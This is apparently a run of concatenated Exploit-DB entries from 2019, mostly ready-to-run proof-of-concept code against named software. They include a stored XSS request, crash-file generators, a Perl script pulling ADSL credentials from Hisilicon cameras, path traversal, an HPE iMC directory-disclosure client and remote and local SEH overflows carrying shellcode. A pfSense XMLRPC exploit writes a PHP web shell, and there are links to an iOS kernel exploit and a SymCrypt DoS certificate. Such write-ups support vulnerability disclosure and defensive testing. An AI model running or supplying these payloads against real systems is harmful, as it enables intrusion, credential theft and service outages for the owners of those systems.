# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting # Author: Cakes # Discovery Date: 2019-09-19 # Vendor Homepage: https://goautodial.org/ # Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso # Tested Version: 4.0 # Tested on OS: CentOS 7 # CVE: N/A # Discription: # Simple XSS attack after application authentication. # POST Request POST /php/CreateEvent.php HTTP/1.1 Host: 10.0.0.25 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.25/events.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 69 Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1 Connection: close DNT: 1 title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef

# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service (DoS) # Exploit Author: Emilio Revelo # Date: 2019-09-20 # Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe # Tested on: Windows 10 Pro x64 es # Steps to produce the DoS: # 1.- Run perl script : perl SpotIE.pl # 2.- Open SpotIE.txt and copy the content to clipboard # 3.- Open SpotIE Internet Explorer Password Recovery # 4.- Navigate to Register -> Enter the registration name and key below... # 5.- Paste ClipBoard on "Key:" # 7.- OK # 8.- Crashed!! #!/usr/local/bin/perl use strict; use warnings; my $filename = 'SpotIE.txt'; open(my $fh, '>', $filename) or die "Could not open file '$filename' $!"; print $fh "E"x256; close $fh; print "Done!\n"; print "File: SpotIE.txt\n"

# Exploit Title: InputMapper < 1.6.10 Local Denial of Service # Date: 20.09.2019 # Vendor Homepage: https://inputmapper.com/ # Software Link: https://inputmapper.com/downloads/category/2-input-mapper # Exploit Author: elkoyote07 # Tested Version: 1.6.10 # Tested on: Windows 10 x64 # 1.- Start Input Mapper # 2.- Click on Guest (Top left) # 3.- Click on Login # 3.- Copy the content of exploit.txt in the Username field # 4.- Once copied double-click on Username field # 5.- Happy crash :) #!/usr/bin/python t = "A" * 15000 try: f=open("exploit.txt","w") f.write(t) f.close() print "Done" except: print "Error"

#!/usr/bin/perl -w # # Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # # # [ # # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure # # [ ============================================================= # # [ Exploit Author: Todor Donev 2019 <[email protected]> # # [ # # [ Disclaimer: # # [ This or previous programs are for Educational purpose # # [ ONLY. Do not use it without permission. The usual # # [ disclaimer applies, especially the fact that Todor Donev # # [ is not liable for any damages caused by direct or # # [ indirect use of the information or functionality provided # # [ by these programs. The author or any Internet provider # # [ bears NO responsibility for content or misuse of these # # [ programs or any derivatives thereof. By using these programs # # [ you accept the fact that any damage (dataloss, system crash, # # [ system compromise, etc.) caused by the use of these programs # # [ are not Todor Donev's responsibility. # # [ # # [ Use them at your own risk! # # [ # # [ Initializing the browser # # [ Server: thttpd/2.25b 29dec2003 # # [ The target is vulnerable # # [ # # [ Directory Traversal # # [ # # [ /cgi-bin/.. # # [ /cgi-bin/adsl_init.cgi # # [ /cgi-bin/chkwifi.cgi # # [ /cgi-bin/ddns_start.cgi # # [ /cgi-bin/getadslattr.cgi # # [ /cgi-bin/getddnsattr.cgi # # [ /cgi-bin/getinetattr.cgi # # [ /cgi-bin/getinterip.cgi # # [ /cgi-bin/getnettype.cgi # # [ /cgi-bin/getupnp.cgi # # [ /cgi-bin/getwifi.cgi # # [ /cgi-bin/getwifiattr.cgi # # [ /cgi-bin/ptzctrldown.cgi # # [ /cgi-bin/ptzctrlleft.cgi # # [ /cgi-bin/ptzctrlright.cgi # # [ /cgi-bin/ptzctrlup.cgi # # [ /cgi-bin/ptzctrlzoomin.cgi # # [ /cgi-bin/ptzctrlzoomout.cgi # # [ /cgi-bin/ser.cgi # # [ /cgi-bin/setadslattr.cgi # # [ /cgi-bin/setddnsattr.cgi # # [ /cgi-bin/setinetattr.cgi # # [ /cgi-bin/setwifiattr.cgi # # [ /cgi-bin/testwifi.cgi # # [ /cgi-bin/upnp_start.cgi # # [ /cgi-bin/upnp_stop.cgi # # [ /cgi-bin/wifi_start.cgi # # [ /cgi-bin/wifi_stop.cgi # # [ # # [ File Reading # # [ # # [ var ip = "" ; # # [ var adslenable = "" ; # # [ var username = "hacker" ; # # [ var password = "133337" ; # # [ var dnsauto = "1" ; # # [ var dns1 = "8.8.8.8" ; # # [ var dns2 = "8.8.4.4" ; # # use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use HTML::TreeBuilder; $| = 1; my $host = shift || 'https://192.168.1.1/'; # Full path url to the store print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 my $banner = "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a"; print $banner; print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/); print "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); my $target = $host."/cgi-bin/"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401'); print "[ Server: ", $response->header('Server'), "\n"; if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){ print "[ The target is vulnerable\n"; print "[\n[ Directory Traversal\n"; my $tree = HTML::TreeBuilder->new_from_content($response->as_string()); my @files = $tree->look_down(_tag => 'a'); print "[ ", $_->attr('href'), "\n" for @files; my $target = $host."/cgi-bin/getadslattr.cgi"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[\n[ File Reading\n"; print "[ ", $_, "\n" for split(/\n/,$response->content()); } else { print "[ Exploit failed! The target isn't vulnerable\n"; exit; }

# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS # Google Dork: N/A # Date: 04-08-2019 # Exploit Author: Sainadh Jamalpur # Vendor Homepage: https://github.com/GilaCMS/gila # Software Link: https://github.com/GilaCMS/gila # Version: 1.10.9 # Tested on: XAMPP version 3.2.2 in Windows 10 64bit, # CVE : CVE-2019-16679 *********** *Steps to reproduce the Vulnerability* ************* Login into the application as an admin user or equivalent user and go the below link http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts ################################################################

#!/opt/local/bin/python2.7 # Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure # Date: 22-09-2019 # Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991) # Vendor Homepage: www.hpe.com # Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber= # Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win # Tested on: Windows 7 # CVE : CVE-2019-5392 # Conversion of Nessus Plugin to Python Exploit # Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl # Description: This vulnerability allow remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user. # See Also: https://www.tenable.com/plugins/nessus/118038 from pyasn1.type.univ import * from pyasn1.type.namedtype import * from pyasn1.codec.ber import encoder import struct import binascii import socket, sys import sys import re if len(sys.argv) != 4: print "USAGE: python %s <ip> <port> <directory>" % (sys.argv[0]) sys.exit(1) else: ip = sys.argv[1] port = int(sys.argv[2]) # Default Port 2810 directory = sys.argv[3] payload = directory.replace("\\","\\\\") opcode = 10001 try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "Socket Created.." except socket.error: print 'Failed to create socket' sys.exit() victim_address = (ip,port) print('connecting to {} port {}'.format(*victim_address)) sock.connect((ip, port)) class DbmanMsg(Sequence): componentType = NamedTypes( NamedType('flag', Integer()), NamedType('dir', OctetString()) ) data = DbmanMsg() data['flag'] = 1 data['dir'] = payload encodeddata = encoder.encode(data, defMode=False) dataLen = len(encodeddata) values = (opcode, dataLen, encodeddata) s = struct.Struct(">ii%ds" % dataLen) packed_data = s.pack(*values) print 'Format string :', s.format print 'Uses :',s.size, 'bytes' print 'Packed Value :', binascii.hexlify(packed_data) print '\n' print 'Sending Payload...' sock.send(packed_data) BUFF_SIZE = 4000 res = sock.recv(BUFF_SIZE) rec = len(res) if (rec == 0): print "No data in the directory" else: print "Data Recived: "+str(rec) a = repr(res) b = a b = re.sub(r'(x\d\d)', '', b) b = re.sub(r'(\\x[\d].)', '', b) b = re.sub(r'(\\x..)', '', b) replacestring = ['"','\\n','\\r','\\t','0'] print "Data in "+payload+" Directory: \n" for r in replacestring: b = b.replace(r,'') b = b.replace("'","") #print b #Remove '#' if output results is not proper matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE) for matchNum, match in enumerate(matches, start=1): print match.group(2) print "Done..." sock.close()

Exploit Title: SockPuppet 3 Date: September 8, 2019 Exploit Author: Umang Raghuvanshi Vendor Homepage: https://apple.com Software Link: https://ipsw.me/ Version: iOS 11.0—12.2, iOS 12.4 Tested on: iOS 11.0—12.2, iOS 12.4 CVE: CVE-2019-8605 This is an alternative (and complete) exploit for CVE-2019-8605. I have only implemented the exploit and do not claim any rights for discovering and/or publishing the vulnerability. The actual exploit code is in “SockPuppet3.cpp”, other files are either helpers or documentation. This exploit [1] has already been verified in production several times [2] [3], however, I can assist in additional verification if required. POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47409.zip [1] https://gist.github.com/ur0/a9b2d8088479a70665f729c4e9bf8720 [2] https://twitter.com/Pwn20wnd/status/1163392040073191426 [3] https://twitter.com/electra_team/status/1163658714840047618

#!/usr/bin/python # Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Vendor Homepage: http://www.sricam.com/ # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe # Version: v3.12.0.1 # Tested on: Windows 7 # Steps to reproduce: # 1. Generate a malicious payload via the POC # 2. In the Sricam application create a new user # 3. When creating a new user, set the username as the malicious payload # 4. Observe a program DOScrash payload = "A" * 5000 try: evilCreate =open("exploit.txt","w") print(""" DeviceViewer 3.12.0.1 DOS exploit POC Author: Nu11pwn """) print("[x] Creating malicious file") evilCreate.write(payload) evilCreate.close() print("[x] Malicious file create") print("[x] When creating a new user, set the username to the file contents") print("[x] Watch the program crash") except: print("[!] File failed to be created")

import socket from struct import * # Exploit Title: File sharing wizard 'post' remote SEH overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Software Link: https://file-sharing-wizard.soft112.com/ # Version: 1.5.0 # Tested on: Windows 7 # CVE : CVE-2019-16724 # File-sharing-wizard-seh #----------------------------------------------# # Bad characters: \x00 # # SEH value: 0x909032EB (JMP short) # # NSEH value: 0x7c38a67f (POP POP RET) # #----------------------------------------------# # Assigned CVE ID : CVE-2019-16724 victim_host = "10.0.0.17" victim_port = 80 # msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode EXITFUNC=seh shellcode = "" shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f" shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef" shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b" shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5" shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97" shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b" shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84" shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85" shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6" shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad" shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50" shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b" shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78" shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7" shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6" shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4" shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74" shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1" shellcode += "\x73\xd9\x01\x0d" nseh = pack ('<I',0x909032EB) # Short jump forward 32 places into NOP sled seh = pack('I',0x7c38a67f) # POP POP RET # 0x7c38a67f : pop ecx # pop ecx # ret | {PAGE_EXECUTE_READ} [MSVCR71.dll] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files (x86)\File Sharing Wizard\bin\MSVCR71.dll) exploit_payload = "A" * 1040 exploit_payload += nseh # JMP short exploit_payload += seh # POPPOPRET exploit_payload += "\x90" * 100 # NOPSLED exploit_payload += shellcode # popping calc.exe exploit_payload += "D" *(5000 - len(exploit_payload)) payload_header = "POST " + exploit_payload payload_header +=" HTTP/1.0\r\n\r\n" # overflowed SEH handler - 42386942 : [*] Exact match at offset 1044 try: print(""" -------------------------------- CVE-2019-16724 proof of concept File sharing wizard SEH overflow -------------------------------- """) expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print("[x] Setting up a socket connection") expl.connect((victim_host, victim_port)) print("[x] Establishing a connection to the victim") expl.send(payload_header) print("[x] Sending ") except: print("[!] Error establishing a connection") print("[!] Error sending exploit")

#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Vendor Homepage: http://www.sharing-file.com/ # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 # Tested on: Windows 7 # Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow # by creating a malicious username, this exploit POC will create a malicious text file # with the contents to execute arbitrary code. # Author : Nu11pwn badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") # found bad chars - "\x00\x0a\x0d" shellcode = "" shellcode += "\xbb\xc4\x1c\xb2\xd3\xdd\xc2\xd9\x74\x24\xf4\x5e" shellcode += "\x2b\xc9\xb1\x31\x31\x5e\x13\x83\xc6\x04\x03\x5e" shellcode += "\xcb\xfe\x47\x2f\x3b\x7c\xa7\xd0\xbb\xe1\x21\x35" shellcode += "\x8a\x21\x55\x3d\xbc\x91\x1d\x13\x30\x59\x73\x80" shellcode += "\xc3\x2f\x5c\xa7\x64\x85\xba\x86\x75\xb6\xff\x89" shellcode += "\xf5\xc5\xd3\x69\xc4\x05\x26\x6b\x01\x7b\xcb\x39" shellcode += "\xda\xf7\x7e\xae\x6f\x4d\x43\x45\x23\x43\xc3\xba" shellcode += "\xf3\x62\xe2\x6c\x88\x3c\x24\x8e\x5d\x35\x6d\x88" shellcode += "\x82\x70\x27\x23\x70\x0e\xb6\xe5\x49\xef\x15\xc8" shellcode += "\x66\x02\x67\x0c\x40\xfd\x12\x64\xb3\x80\x24\xb3" shellcode += "\xce\x5e\xa0\x20\x68\x14\x12\x8d\x89\xf9\xc5\x46" shellcode += "\x85\xb6\x82\x01\x89\x49\x46\x3a\xb5\xc2\x69\xed" shellcode += "\x3c\x90\x4d\x29\x65\x42\xef\x68\xc3\x25\x10\x6a" shellcode += "\xac\x9a\xb4\xe0\x40\xce\xc4\xaa\x0e\x11\x5a\xd1" shellcode += "\x7c\x11\x64\xda\xd0\x7a\x55\x51\xbf\xfd\x6a\xb0" shellcode += "\x84\xfc\x9b\x09\x10\x68\x02\xf8\x59\xf4\xb5\xd6" shellcode += "\x9d\x01\x36\xd3\x5d\xf6\x26\x96\x58\xb2\xe0\x4a" shellcode += "\x10\xab\x84\x6c\x87\xcc\x8c\x0e\x46\x5f\x4c\xff" shellcode += "\xed\xe7\xf7\xff" # Log data, item 69 # Address=0BADF00D # Message= 0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) # Log data, item 24 # Address=100195F2 # Message= 0x100195f2 : pop esi # pop ecx # ret | {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) nseh = "\xEB\x06\x90\x90" seh = "\xF2\x95\x01\x10" payload = "A" * 4059 payload += nseh payload += seh payload += "\x90" * 16 payload += shellcode payload += "D" *4000 # SEH chain of main thread, item 1 # Address=46336646 # SE handler=*** CORRUPT ENTRY *** # Log data, item 34 # Address=0BADF00D # Message= SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler # [*] Exact match at offset 4059 try: evilCreate =open("exploit.txt","w") print(""" Easy File Sharing web server SEH overflow """) print("[x] Creating malicious file") evilCreate.write(payload) evilCreate.close() print("[x] Malicious file create") print("[x] Go to user accounts and add a new user with malicious name") print("[x] Watch the program crash") except: print("[!] File failed to be created")

# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection # Date: 23/09/2018 # Author: Nassim Asrir # Vendor Homepage: https://www.pfsense.org/ # Contact: [email protected] | https://www.linkedin.com/in/nassim-asrir-b73a57122/ # CVE: CVE-2019-16701 # Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3 ###################################################################################################### 1 : About Pfsense: ================== pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more. 2 : Technical Analysis: ======================= The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands. XMLRPC methods: pfsense.exec_shell pfsense.exec_php pfsense.filter_configure pfsense.interfaces_carp_configure pfsense.backup_config_section pfsense.restore_config_section pfsense.merge_config_section pfsense.merge_installedpackages_section_xmlrpc pfsense.host_firmware_version pfsense.reboot pfsense.get_notices system.listMethods system.methodHelp system.methodSignature As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php. 2 : Static Analysis: ==================== In the static analysis we will analysis the xmlrpc.php file. Line (73 - 82) This code check if the user have enough privileges. $user_entry = getUserEntry($username); /* * admin (uid = 0) is allowed * or regular user with necessary privilege */ if (isset($user_entry['uid']) && $user_entry['uid'] != '0' && !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) { log_auth("webConfigurator authentication error for '" . $username . "' from " . $this->remote_addr . " not enough privileges"); Line (137 - 146) This part of code is the interest for us. As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code). public function exec_php($code) { $this->auth(); eval($code); if ($toreturn) { return $toreturn; } return true; } Line (155 - 160) In this part of code also we have a check for auth then the execution for ($code) public function exec_shell($code) { $this->auth(); mwexec($code); return true; } 3 - Exploit: ============ #!/usr/bin/env python import argparse import requests import urllib2 import time import sys import string import random parser = argparse.ArgumentParser() parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1") parser.add_argument("--password", help = "pfsense Password") args = parser.parse_args() rhost = args.rhost password = args.password print "" print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection" print "" print "[+] Author: Nassim Asrir" print "" command = "<?xml version='1.0' encoding='iso-8859-1'?>" command += "<methodCall>" command += "<methodName>pfsense.host_firmware_version</methodName>" command += "<params>" command += "<param><value><string>"+password+"</string></value></param>" command += "</params>" command += "</methodCall>" stage1 = rhost + "/xmlrpc.php" page = urllib2.urlopen(stage1, data=command).read() print "[+] Checking Login Creds" if "Authentication failed" in page: print "[-] Wrong password :(" sys.exit(0) else: random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)]) print "[+] logged in successfully :)" print "[+] Generating random file "+random+".php" print "[+] Sending the exploit ....." command = "<?xml version='1.0' encoding='iso-8859-1'?>" command += "<methodCall>" command += "<methodName>pfsense.exec_php</methodName>" command += "<params>" command += "<param><value><string>"+password+"</string></value></param>" command += "<param><value><string>exec('echo \\'<pre> <?php $res = system($_GET[\"cmd\"]); echo $res ?> </pre>\\' > /usr/local/www/"+random+".php');</string></value></param>" command += "</params>" command += "</methodCall>" stage1 = rhost + "/xmlrpc.php" page = urllib2.urlopen(stage1, data=command).read() final = rhost+"/"+str(random)+".php" check = urllib2.urlopen(final) print "[+] Checking ....." if check.getcode() == 200: print "[+] Yeah! You got your shell: " + final+"?cmd=id" else: print "[+] Sorry :( Shell not found check the path"

There's a bug in the SymCrypt multi-precision arithmetic routines that can cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric. I've been able to construct an X.509 certificate that triggers the bug. I've found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g. ipsec, iis, exchange, etc) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock. You can verify it like so, and notice the command never completes: C:\> certutil.exe testcase.crt Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47414.zip